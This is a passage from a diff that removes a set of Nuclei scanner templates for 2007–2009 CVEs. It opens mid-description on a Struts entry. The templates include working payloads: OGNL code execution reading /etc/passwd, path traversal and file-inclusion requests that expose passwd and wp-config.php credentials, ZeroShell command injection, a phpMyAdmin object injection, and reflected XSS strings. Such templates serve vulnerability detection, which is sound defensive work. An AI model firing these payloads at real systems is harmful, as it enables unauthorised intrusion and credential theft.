Apache Struts support in OpenSymphony XWork before 1.2.3, and 2.x before 2.0.4, as used in WebWork and Apache Struts, recursively evaluates all input as an Object-Graph Navigation Language (OGNL) expression when altSyntax is enabled, which allows remote attackers to cause a denial of service (infinite loop) or execute arbitrary code via for"m input beginning with a "%{" sequence and ending with a "}" character.
|
||||
reference:
|
||||
- https://www.guildhab.top/?p=2326
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2007-4556
|
||||
- https://cwiki.apache.org/confluence/display/WW/S2-001
|
||||
- http://forums.opensymphony.com/ann.jspa?annID=54
|
||||
classification:
|
||||
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P
|
||||
cvss-score: 6.8
|
||||
cve-id: CVE-2007-4556
|
||||
cwe-id: NVD-CWE-Other
|
||||
tags: cve,cve2007,apache,rce,struts
|
||||
|
||||
requests:
|
||||
- method: POST
|
||||
path:
|
||||
- "{{BaseURL}}/login.action"
|
||||
headers:
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
body: |
|
||||
username=test&password=%25%7B%23a%3D%28new+java.lang.ProcessBuilder%28new+java.lang.String%5B%5D%7B%22cat%22%2C%22%2Fetc%2Fpasswd%22%7D%29%29.redirectErrorStream%28true%29.start%28%29%2C%23b%3D%23a.getInputStream%28%29%2C%23c%3Dnew+java.io.InputStreamReader%28%23b%29%2C%23d%3Dnew+java.io.BufferedReader%28%23c%29%2C%23e%3Dnew+char%5B50000%5D%2C%23d.read%28%23e%29%2C%23f%3D%23context.get%28%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22%29%2C%23f.getWriter%28%29.println%28new+java.lang.String%28%23e%29%29%2C%23f.getWriter%28%29.flush%28%29%2C%23f.getWriter%28%29.close%28%29%7D
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
||||
part: body
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/05/10
|
|
@ -1,44 +0,0 @@
|
|||
id: CVE-2007-5728
|
||||
|
||||
info:
|
||||
name: phpPgAdmin <=4.1.1 - Cross-Site Scripting
|
||||
author: dhiyaneshDK
|
||||
severity: medium
|
||||
description: phpPgAdmin 3.5 to 4.1.1, and possibly 4.1.2, is vulnerable to cross-site scripting and allows remote attackers to inject arbitrary web script or HTML via certain input available in PHP_SELF in (1) redirect.php, possibly related to (2) login.php, which are different vectors than CVE-2007-2865.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/30090
|
||||
- http://lists.grok.org.uk/pipermail/full-disclosure/2007-May/063617.html
|
||||
- http://web.archive.org/web/20210130131735/https://www.securityfocus.com/bid/24182/
|
||||
- http://web.archive.org/web/20161220160642/http://secunia.com/advisories/25446/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2007-5728
|
||||
classification:
|
||||
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N
|
||||
cvss-score: 4.3
|
||||
cve-id: CVE-2007-5728
|
||||
cwe-id: CWE-79
|
||||
metadata:
|
||||
shodan-query: http.title:"phpPgAdmin"
|
||||
tags: cve,cve2007,xss,pgadmin,phppgadmin,edb
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/redirect.php/%22%3E%3Cscript%3Ealert(%22document.domain%22)%3C/script%3E?subject=server&server=test'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- '<script>alert("document.domain")</script>'
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- "text/html"
|
||||
|
||||
# Enhanced by mp on 2022/08/12
|
|
@ -1,39 +0,0 @@
|
|||
id: CVE-2008-1059
|
||||
|
||||
info:
|
||||
name: WordPress Sniplets 1.1.2 - Local File Inclusion
|
||||
author: dhiyaneshDK
|
||||
severity: high
|
||||
description: |
|
||||
PHP remote file inclusion vulnerability in modules/syntax_highlight.php in the Sniplets 1.1.2 and 1.2.2 plugin for WordPress allows remote attackers to execute arbitrary PHP code via a URL in the libpath parameter.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/5194
|
||||
- https://wpscan.com/vulnerability/d0278ebe-e6ae-4f7c-bcad-ba318573f881
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2008-1059
|
||||
- https://web.archive.org/web/20090615225856/http://secunia.com/advisories/29099/
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
|
||||
cvss-score: 7.2
|
||||
cve-id: CVE-2008-1059
|
||||
cwe-id: CWE-79
|
||||
tags: lfi,cve,cve2008,wordpress,wp-plugin,wp,sniplets,edb,wpscan
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/wp-content/plugins/sniplets/modules/syntax_highlight.php?libpath=../../../../wp-config.php'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "DB_NAME"
|
||||
- "DB_PASSWORD"
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/07/29
|
|
@ -1,43 +0,0 @@
|
|||
id: CVE-2008-1061
|
||||
|
||||
info:
|
||||
name: WordPress Sniplets <=1.2.2 - Cross-Site Scripting
|
||||
author: dhiyaneshDK
|
||||
severity: high
|
||||
description: |
|
||||
WordPress Sniplets 1.1.2 and 1.2.2 plugin contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary web script or HTML via the text parameter to warning.php, notice.php, and inset.php in view/sniplets/, and possibly modules/execute.php; via the url parameter to view/admin/submenu.php; and via the page parameter to view/admin/pager.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/5194
|
||||
- https://wpscan.com/vulnerability/d0278ebe-e6ae-4f7c-bcad-ba318573f881
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2008-1061
|
||||
- http://securityreason.com/securityalert/3706
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
|
||||
cvss-score: 7.2
|
||||
cve-id: CVE-2008-1061
|
||||
cwe-id: CWE-79
|
||||
tags: xss,wp-plugin,wp,edb,wpscan,cve,cve2008,wordpress,sniplets
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/wp-content/plugins/sniplets/view/sniplets/warning.php?text=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
|
||||
# Enhanced by mp on 2022/08/31
|
|
@ -1,41 +0,0 @@
|
|||
id: CVE-2008-2398
|
||||
|
||||
info:
|
||||
name: AppServ Open Project <=2.5.10 - Cross-Site Scripting
|
||||
author: unstabl3
|
||||
severity: medium
|
||||
description: AppServ Open Project 2.5.10 and earlier contains a cross-site scripting vulnerability in index.php which allows remote attackers to inject arbitrary web script or HTML via the appservlang parameter.
|
||||
reference:
|
||||
- https://exchange.xforce.ibmcloud.com/vulnerabilities/42546
|
||||
- http://web.archive.org/web/20210121181851/https://www.securityfocus.com/bid/29291/
|
||||
- http://web.archive.org/web/20140724110348/http://secunia.com/advisories/30333/
|
||||
- http://securityreason.com/securityalert/3896
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2008-2398
|
||||
classification:
|
||||
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:N/I:P/A:N
|
||||
cve-id: CVE-2008-2398
|
||||
cwe-id: CWE-79
|
||||
cvss-score: 4.3
|
||||
tags: cve,cve2008,xss
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?appservlang=%3Csvg%2Fonload=confirm%28%27xss%27%29%3E"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
- type: word
|
||||
words:
|
||||
- "<svg/onload=confirm('xss')>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "text/html"
|
||||
part: header
|
||||
|
||||
# Enhanced by mp on 2022/08/12
|
|
@ -1,40 +0,0 @@
|
|||
id: CVE-2008-2650
|
||||
|
||||
info:
|
||||
name: CMSimple 3.1 - Local File Inclusion
|
||||
author: pussycat0x
|
||||
severity: high
|
||||
description: |
|
||||
CMSimple 3.1 is susceptible to local file inclusion via cmsimple/cms.php when register_globals is enabled which allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the sl parameter to index.php. NOTE: this can be leveraged for remote file execution by including adm.php and then invoking the upload action. NOTE: on 20080601, the vendor patched 3.1 without changing the version number.
|
||||
reference:
|
||||
- http://www.cmsimple.com/forum/viewtopic.php?f=2&t=17
|
||||
- http://web.archive.org/web/20210121182016/https://www.securityfocus.com/bid/29450/
|
||||
- http://web.archive.org/web/20140729144732/http://secunia.com:80/advisories/30463
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2008-2650
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
|
||||
cvss-score: 8.6
|
||||
cve-id: CVE-2008-2650
|
||||
cwe-id: CWE-22
|
||||
tags: cve,cve2008,lfi,cmsimple
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
GET /index.php?sl=../../../../../../../etc/passwd%00 HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
part: body
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/07/06
|
|
@ -1,36 +0,0 @@
|
|||
id: CVE-2008-4668
|
||||
|
||||
info:
|
||||
name: Joomla! Image Browser 0.1.5 rc2 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Joomla! Image Browser 0.1.5 rc2 is susceptible to local file inclusion via com_imagebrowser which could allow remote attackers to include and execute arbitrary local files via a .. (dot dot) in the folder parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/6618
|
||||
- http://web.archive.org/web/20210121183742/https://www.securityfocus.com/bid/31458/
|
||||
- http://securityreason.com/securityalert/4464
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2008-4668
|
||||
classification:
|
||||
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:P/A:P
|
||||
cvss-score: 9
|
||||
cve-id: CVE-2008-4668
|
||||
cwe-id: CWE-22
|
||||
tags: cve,cve2008,joomla,lfi,edb
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_imagebrowser&folder=../../../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/07/06
|
|
@ -1,36 +0,0 @@
|
|||
id: CVE-2008-4764
|
||||
|
||||
info:
|
||||
name: Joomla! <=2.0.0 RC2 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Joomla! 2.0.0 RC2 and earlier are susceptible to local file inclusion in the eXtplorer module (com_extplorer) that allows remote attackers to read arbitrary files via a .. (dot dot) in the dir parameter in a show_error action.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/5435
|
||||
- http://web.archive.org/web/20210121181347/https://www.securityfocus.com/bid/28764/
|
||||
- https://exchange.xforce.ibmcloud.com/vulnerabilities/41873
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2008-4764
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
|
||||
cvss-score: 8.6
|
||||
cve-id: CVE-2008-4764
|
||||
cwe-id: CWE-22
|
||||
tags: edb,cve,cve2008,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_extplorer&action=show_error&dir=..%2F..%2F..%2F%2F..%2F..%2Fetc%2Fpasswd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/07/06
|
|
@ -1,39 +0,0 @@
|
|||
id: CVE-2008-5587
|
||||
|
||||
info:
|
||||
name: phpPgAdmin <=4.2.1 - Local File Inclusion
|
||||
author: dhiyaneshDK
|
||||
severity: medium
|
||||
description: phpPgAdmin 4.2.1 is vulnerable to local file inclusion in libraries/lib.inc.php when register globals is enabled. Remote attackers can read arbitrary files via a .. (dot dot) in the _language parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/7363
|
||||
- http://web.archive.org/web/20210121184707/https://www.securityfocus.com/bid/32670/
|
||||
- http://web.archive.org/web/20160520063306/http://secunia.com/advisories/33014
|
||||
- http://web.archive.org/web/20151104173853/http://secunia.com/advisories/33263
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2008-5587
|
||||
classification:
|
||||
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:N/A:N
|
||||
cvss-score: 4.3
|
||||
cve-id: CVE-2008-5587
|
||||
cwe-id: CWE-22
|
||||
metadata:
|
||||
shodan-query: http.title:"phpPgAdmin"
|
||||
tags: cve,cve2008,lfi,phppgadmin,edb
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/phpPgAdmin/index.php?_language=../../../../../../../../etc/passwd%00'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/07/22
|
|
@ -1,36 +0,0 @@
|
|||
id: CVE-2008-6080
|
||||
|
||||
info:
|
||||
name: Joomla! ionFiles 4.4.2 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Joomla! ionFiles 4.4.2 is susceptible to local file inclusion in download.php in the ionFiles (com_ionfiles) that allows remote attackers to read arbitrary files via a .. (dot dot) in the file parameter.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/6809
|
||||
- http://web.archive.org/web/20140804231654/http://secunia.com/advisories/32377/
|
||||
- http://web.archive.org/web/20210121184101/https://www.securityfocus.com/bid/31877/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2008-6080
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
|
||||
cvss-score: 8.6
|
||||
cve-id: CVE-2008-6080
|
||||
cwe-id: CWE-22
|
||||
tags: edb,cve,cve2008,joomla,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/components/com_ionfiles/download.php?file=../../../../../../../../etc/passwd&download=1"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/07/06
|
|
@ -1,36 +0,0 @@
|
|||
id: CVE-2008-6172
|
||||
|
||||
info:
|
||||
name: Joomla! Component RWCards 3.0.11 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: A directory traversal vulnerability in captcha/captcha_image.php in the RWCards (com_rwcards) 3.0.11 component for Joomla! when magic_quotes_gpc is disabled allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the img parameter.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/6817
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2008-6172
|
||||
- http://web.archive.org/web/20140804232841/http://secunia.com/advisories/32367/
|
||||
- http://web.archive.org/web/20210121184108/https://www.securityfocus.com/bid/31892/
|
||||
classification:
|
||||
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P
|
||||
cvss-score: 6.8
|
||||
cve-id: CVE-2008-6172
|
||||
cwe-id: CWE-22
|
||||
tags: cve2008,joomla,lfi,edb,cve
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/components/com_rwcards/captcha/captcha_image.php?img=../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/03/30
|
|
@ -1,36 +0,0 @@
|
|||
id: CVE-2008-6222
|
||||
|
||||
info:
|
||||
name: Joomla! ProDesk 1.0/1.2 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Joomla! Pro Desk Support Center (com_pro_desk) component 1.0 and 1.2 allows remote attackers to read arbitrary files via a .. (dot dot) in the include_file parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/6980
|
||||
- http://web.archive.org/web/20111223225601/http://secunia.com/advisories/32523/
|
||||
- http://web.archive.org/web/20210121184244/https://www.securityfocus.com/bid/32113/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2008-6222
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
|
||||
cvss-score: 8.6
|
||||
cve-id: CVE-2008-6222
|
||||
cwe-id: CWE-22
|
||||
tags: cve2008,joomla,lfi,edb,cve
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_pro_desk&include_file=../../../../../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/07/06
|
|
@ -1,47 +0,0 @@
|
|||
id: CVE-2008-6465
|
||||
|
||||
info:
|
||||
name: Parallels H-Sphere 3.0.0 P9/3.1 P1 - Cross-Site Scripting
|
||||
author: edoardottt
|
||||
severity: medium
|
||||
description: |
|
||||
Parallels H-Sphere 3.0.0 P9 and 3.1 P1 contains multiple cross-site scripting vulnerabilities in login.php in webshell4. An attacker can inject arbitrary web script or HTML via the err, errorcode, and login parameters, thus allowing theft of cookie-based authentication credentials and launch of other attacks.
|
||||
reference:
|
||||
- http://www.xssing.com/index.php?x=3&y=65
|
||||
- https://exchange.xforce.ibmcloud.com/vulnerabilities/45254
|
||||
- https://exchange.xforce.ibmcloud.com/vulnerabilities/45252
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2008-6465
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
|
||||
cvss-score: 5.4
|
||||
cve-id: CVE-2008-6465
|
||||
cwe-id: CWE-80
|
||||
metadata:
|
||||
verified: true
|
||||
shodan-query: title:"Parallels H-Sphere
|
||||
tags: cve,cve2008,xss,parallels,h-sphere
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/webshell4/login.php?errcode=0&login=\%22%20onfocus=alert(document.domain);%20autofocus%20\%22&err=U'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- '\" onfocus=alert(document.domain); autofocus'
|
||||
- 'Please enter login name & password'
|
||||
condition: and
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- 'text/html'
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by md on 2022/12/08
|
|
@ -1,38 +0,0 @@
|
|||
id: CVE-2008-6668
|
||||
|
||||
info:
|
||||
name: nweb2fax <=0.2.7 - Local File Inclusion
|
||||
author: geeknik
|
||||
severity: high
|
||||
description: nweb2fax 0.2.7 and earlier allow remote attackers to read arbitrary files via the id parameter submitted to comm.php and the var_filename parameter submitted to viewrq.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/5856
|
||||
- http://web.archive.org/web/20210130035550/https://www.securityfocus.com/bid/29804
|
||||
- https://exchange.xforce.ibmcloud.com/vulnerabilities/43173
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2008-6668
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
|
||||
cvss-score: 8.6
|
||||
cve-id: CVE-2008-6668
|
||||
cwe-id: CWE-22
|
||||
tags: cve2008,nweb2fax,lfi,traversal,edb,cve
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/comm.php?id=../../../../../../../../../../etc/passwd"
|
||||
- "{{BaseURL}}/viewrq.php?format=ps&var_filename=../../../../../../../../../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
part: body
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/07/06
|
|
@ -1,43 +0,0 @@
|
|||
id: CVE-2008-6982
|
||||
|
||||
info:
|
||||
name: Devalcms 1.4a - Cross-Site Scripting
|
||||
author: arafatansari
|
||||
severity: high
|
||||
description: |
|
||||
Devalcms 1.4a contains a cross-site scripting vulnerability in the currentpath parameter of the index.php file.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/6369
|
||||
- http://sourceforge.net/projects/devalcms/files/devalcms/devalcms-1.4b/devalcms-1.4b.zip/download
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2008-6982
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
|
||||
cvss-score: 7.2
|
||||
cve-id: CVE-2008-6982
|
||||
cwe-id: CWE-79
|
||||
metadata:
|
||||
verified: "true"
|
||||
tags: cve,cve2008,devalcms,xss,cms,edb
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/index.php?currentpath=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
part: body
|
||||
words:
|
||||
- 'sub menu for: <script>alert(document.domain)</script>'
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 500
|
||||
|
||||
# Enhanced by md on 2022/09/20
|
|
@ -1,31 +0,0 @@
|
|||
id: CVE-2009-0545
|
||||
|
||||
info:
|
||||
name: ZeroShell <= 1.0beta11 Remote Code Execution
|
||||
author: geeknik
|
||||
severity: critical
|
||||
description: ZeroShell 1.0beta11 and earlier via cgi-bin/kerbynet allows remote attackers to execute arbitrary commands through shell metacharacters in the type parameter in a NoAuthREQ x509List action.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/8023
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2009-0545
|
||||
- http://www.zeroshell.net/eng/announcements/
|
||||
- http://www.ikkisoft.com/stuff/LC-2009-01.txt
|
||||
classification:
|
||||
cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:N/C:C/I:C/A:C
|
||||
cvss-score: 10
|
||||
cve-id: CVE-2009-0545
|
||||
cwe-id: CWE-20
|
||||
tags: edb,cve,cve2009,zeroshell,kerbynet,rce
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;/root/kerbynet.cgi/scripts/getkey%20../../../etc/passwd;%22"
|
||||
|
||||
matchers:
|
||||
- type: regex
|
||||
part: body
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
||||
|
||||
# Enhanced by mp on 2022/04/18
|
|
@ -1,36 +0,0 @@
|
|||
id: CVE-2009-0932
|
||||
|
||||
info:
|
||||
name: Horde/Horde Groupware - Local File Inclusion
|
||||
author: pikpikcu
|
||||
severity: high
|
||||
description: Horde before 3.2.4 and 3.3.3 and Horde Groupware before 1.1.5 are susceptible to local file inclusion in framework/Image/Image.php because it allows remote attackers to include and execute arbitrary local files via directory traversal sequences in the Horde_Image driver name.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/16154
|
||||
- http://cvs.horde.org/co.php/groupware/docs/groupware/CHANGES?r=1.28.2.5
|
||||
- http://web.archive.org/web/20161228102217/http://secunia.com/advisories/33695
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2009-0932?cpeVersion=2.2
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
|
||||
cvss-score: 8.6
|
||||
cve-id: CVE-2009-0932
|
||||
cwe-id: CWE-22
|
||||
tags: cve,cve2009,horde,lfi,traversal,edb
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/horde/util/barcode.php?type=../../../../../../../../../../../etc/./passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
# Enhanced by mp on 2022/07/06
|
|
@ -1,42 +0,0 @@
|
|||
id: CVE-2009-1151
|
||||
|
||||
info:
|
||||
name: PhpMyAdmin Scripts - Remote Code Execution
|
||||
author: princechaddha
|
||||
severity: critical
|
||||
description: PhpMyAdmin Scripts 2.11.x before 2.11.9.5 and 3.x before 3.1.3.1 are susceptible to a remote code execution in setup.php that allows remote attackers to inject arbitrary PHP code into a configuration file via the save action. Combined with the ability to save files on server, this can allow unauthenticated users to execute arbitrary PHP code.
|
||||
reference:
|
||||
- https://www.phpmyadmin.net/security/PMASA-2009-3/
|
||||
- https://github.com/vulhub/vulhub/tree/master/phpmyadmin/WooYun-2016-199433
|
||||
- http://phpmyadmin.svn.sourceforge.net/viewvc/phpmyadmin/branches/MAINT_2_11_9/phpMyAdmin/scripts/setup.php?r1=11514&r2=12301&pathrev=12301
|
||||
- http://www.phpmyadmin.net/home_page/security/PMASA-2009-3.php
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2009-1151
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
|
||||
cvss-score: 10
|
||||
cve-id: CVE-2009-1151
|
||||
cwe-id: CWE-77
|
||||
tags: deserialization,kev,vulhub,cve,cve2009,phpmyadmin,rce
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |
|
||||
POST /scripts/setup.php HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Accept-Encoding: gzip, deflate
|
||||
Accept: */*
|
||||
Content-Type: application/x-www-form-urlencoded
|
||||
|
||||
action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
||||
|
||||
# Enhanced by mp on 2022/07/06
|
|
@ -1,36 +0,0 @@
|
|||
id: CVE-2009-1496
|
||||
|
||||
info:
|
||||
name: Joomla! Cmimarketplace 0.1 - Local File Inclusion
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: |
|
||||
Joomla! Cmimarketplace 0.1 is susceptible to local file inclusion because com_cmimarketplace allows remote attackers to list arbitrary directories via a .. (dot dot) in the viewit parameter to index.php.
|
||||
reference:
|
||||
- https://www.exploit-db.com/exploits/8367
|
||||
- http://web.archive.org/web/20210121190149/https://www.securityfocus.com/bid/34431/
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2009-1496
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
|
||||
cvss-score: 8.6
|
||||
cve-id: CVE-2009-1496
|
||||
cwe-id: CWE-22
|
||||
tags: joomla,lfi,edb,cve,cve2009
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.php?option=com_cmimarketplace&Itemid=70&viewit=/../../../../../../etc/passwd&cid=1"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0:"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
